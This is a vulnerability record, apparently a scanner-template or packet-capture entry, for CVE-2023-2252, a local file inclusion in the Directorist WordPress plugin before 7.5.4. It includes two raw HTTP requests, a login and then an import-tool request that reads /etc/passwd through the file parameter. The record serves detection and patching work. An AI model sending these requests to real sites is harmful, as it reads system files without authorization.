| Title | Directorist < 7.5.4 - Local File Inclusion |
|---|---|
| Author | r3Y3r53 |
| Severity | Low |
| Impact | Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. |
| Remediation | Fixed in version 7.5.4 |
| CVSS Score | 2.7 |
| EPSS Score | 0.10304 |
| CVE ID | CVE-2023-2252 |
| CWE ID | CWE-22 |
| Tags | cve2023 cve wpscan lfi directorist wordpress wp-plugin wp authenticated wpwax vuln |
Directorist before 7.5.4 is susceptible to Local File Inclusion as it does not validate the file parameter when importing CSV files.
POST /wp-login.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586
Connection: close
Content-Length: 38
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
log=lGBTl8&pwd=LLQ8IA&wp-submit=Log+In
GET /wp-admin/edit.php?post_type=at_biz_dir&page=tools&step=2&file=%2Fetc%2Fpasswd&delimiter=%3B HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15
Connection: close
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-2252.yaml
🦈 Packet Capture: ⬇️ Download cve-2023-2252.pcap
N/AN/A